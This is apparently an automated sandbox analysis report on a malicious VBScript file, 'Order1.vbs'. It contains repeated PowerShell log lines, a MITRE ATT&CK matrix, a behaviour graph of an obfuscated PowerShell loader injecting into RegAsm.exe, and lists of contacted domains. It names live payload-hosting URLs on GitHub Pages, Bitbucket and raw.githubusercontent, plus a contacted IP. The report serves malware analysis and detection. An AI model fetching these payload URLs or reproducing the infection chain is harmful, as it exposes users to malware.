                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts2
                Command and Scripting Interpreter                		221
                Scripting                		211
                Process Injection                		1
                Disable or Modify Tools                		OS Credential Dumping11
                Security Software Discovery                		Remote Services11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		31
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		Logon Script (Windows)Logon Script (Windows)211
                Process Injection                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook1
                Deobfuscate/Decode Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Software Packing                		Cached Domain Credentials12
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612365 Sample: Order1.vbs Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 25 ofice365.github.io 2->25 27 raw.githubusercontent.com 2->27 29 bitbucket.org 2->29 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 13 other signatures 2->51 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 55 VBScript performs obfuscated calls to suspicious functions 9->55 57 Suspicious powershell command line found 9->57 59 Wscript starts Powershell (via cmd or directly) 9->59 61 2 other signatures 9->61 12 powershell.exe 7 9->12         started        process6 signatures7 63 Suspicious powershell command line found 12->63 65 Suspicious execution chain found 12->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 12->67 15 powershell.exe 14 23 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 33 ofice365.github.io 185.199.110.153, 443, 49701 FASTLYUS Netherlands 15->33 35 raw.githubusercontent.com 185.199.110.133, 443, 49770 FASTLYUS Netherlands 15->35 37 bitbucket.org 185.166.143.50, 443, 49700 AMAZON-02US Germany 15->37 39 Writes to foreign memory regions 15->39 41 Injects a PE file into a foreign processes 15->41 43 Loading BitLocker PowerShell Module 15->43 21 RegAsm.exe 2 15->21         started        signatures10 process11 dnsIp12 31 172.81.130.34, 49783, 49790, 49836 DATAWAGONUS United States 21->31 53 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->53 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Order1.vbs20%VirustotalBrowse
                Order1.vbs16%ReversingLabs

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://preferences.atlassian.com0%Avira URL Cloudsafe
                https://ofice365.github.io/1/test.jpg100%Avira URL Cloudmalware
                https://ofice365.github.io100%Avira URL Cloudmalware
                https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
                https://bitbucket.status.atlassian.com/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bitbucket.org
                		185.166.143.50
                		truefalse
                  		high
                  raw.githubusercontent.com
                  		185.199.110.133
                  		truefalse
                    		high
                    ofice365.github.io
                    		185.199.110.153
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://ofice365.github.io/1/test.jpgtrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113false
                        		high
                        https://raw.githubusercontent.com/richie213/karanew/refs/heads/main/ieIgFed.txtfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/jsi18n/en/djpowershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJRegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://admin.atlassian.compowershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/img/default_powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/bd59e0614108/css/themes/apowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.bitbucket.orgpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://preferences.atlassian.compowershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.atlassian.com/try/cloud/signup?bundle=bitbucketpowershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netiRegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://remote-app-switcher.prod-east.frontend.public.atl-paas.netpowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://stackoverflow.com/q/11564914/23354;RegAsm.exe, 00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2618327273.00000000057E0000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2600719194.0000000004035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bitbucket.status.atlassian.com/powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://id.atlassian.com/profile/rest/profile&quot;powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://aui-cdn.atlassian.com/powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097343000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000004.00000002.1474264752.000002309735C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bqlf8qjztdtr.statuspage.iopowershell.exe, 00000004.00000002.1474264752.0000023097360000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
